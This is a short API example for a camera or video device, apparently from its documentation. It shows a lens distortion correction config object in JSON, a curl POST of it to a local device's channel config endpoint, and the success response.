{
"id": "GSF_ID_CODEC_LDC",
"op": "G1C0S0",
"data": {
"enable": 0,
"part": 50,
"pipe": 50,
"chn": 50,
"aspect": 0,
"x_ratio": 0,
"y_ratio": 100,
"xy_ratio": 100,
"x_offset": 0,
"y_offset": 0,
"distortion_ratio": 500
}
}
curl --location --request POST 'http://192.168.0.168/api/channel/config' \
--header 'Cookie: access_token=;access_token=' \
--header 'Content-Type: application/json' \
--data-raw '{
"id": "GSF_ID_CODEC_LDC",
"op": "G1C0S0",
"data": {
"enable": 0,
"part": 50,
"pipe": 50,
"chn": 50,
"aspect": 0,
"x_ratio": 0,
"y_ratio": 100,
"xy_ratio": 100,
"x_offset": 0,
"y_offset": 0,
"distortion_ratio": 500
}
}'
{
"code": 0,
"data": {}
}